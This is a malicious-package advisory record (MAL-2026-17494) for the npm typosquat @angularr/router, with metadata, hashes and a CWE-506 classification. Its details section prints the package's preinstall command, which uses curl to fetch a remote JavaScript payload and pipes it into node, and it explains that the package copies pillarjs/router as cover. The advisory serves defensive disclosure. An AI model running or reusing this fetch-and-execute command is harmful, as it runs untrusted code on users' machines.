MAL-2026-17494

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angularr/router/MAL-2026-17494.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17494
Published
2026-10-04T23:18:03Z
Modified
2026-10-04T23:45:17Z
Summary
Malicious code in @angularr/router (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (646c9fd4e8d09651eb6d5ec997e6d1b62f294d39d52ec3b4143853c922f15e83)

The package.json preinstall script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an unpinned, unverified JavaScript payload from a third-party repository (gitflic.ru user hellscripter, proxied via web.archive.org) and piping it directly into Node for execution during npm install. The code executes with the installer's privileges before any package code is loaded. The package name @angularr/router (double-r) resembles @angular/router, while the shipped library code is a verbatim copy of pillarjs/router (unrelated to Angular) that serves as cover for the malicious lifecycle hook.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020909",
            "import_time":  "2026-10-04T23:40:40.951801571Z",
            "modified_time":  "2026-10-04T23:18:03Z",
            "sha256":  "646c9fd4e8d09651eb6d5ec997e6d1b62f294d39d52ec3b4143853c922f15e83",
            "source":  "amazon-inspector",
            "versions":  [
                "2.2.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @angularr/router

Package

Name
@angularr/router
View open source insights on deps.dev
Purl
pkg:npm/%40angularr/router

Affected ranges

Affected versions

2.*
2.2.0

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "5f1f5a2499b09d6cbe0b9c7598c0b8245a737d069009eafd4b780c98ca280301",
            "tlsh":  "db21db31cc489c3312c92af578295043b561480b8d04fe1db7ee032c4f4e26f657aa29"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "router-2.2.0.tgz",
            "hashes":  {
                "sha1":  "90e5f2267e7b9561b10113e7544771f0f9bf3d48",
                "sha512_sri":  "sha512-bx9e3exgfGJojDnzwsf0V6HXAnVVQry8IbwC2ItqYpZfE3IFfY03B4KORjudfhwdz4QZHxZ60L6I8M5U7cBpeg=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angularr/router/MAL-2026-17494.json"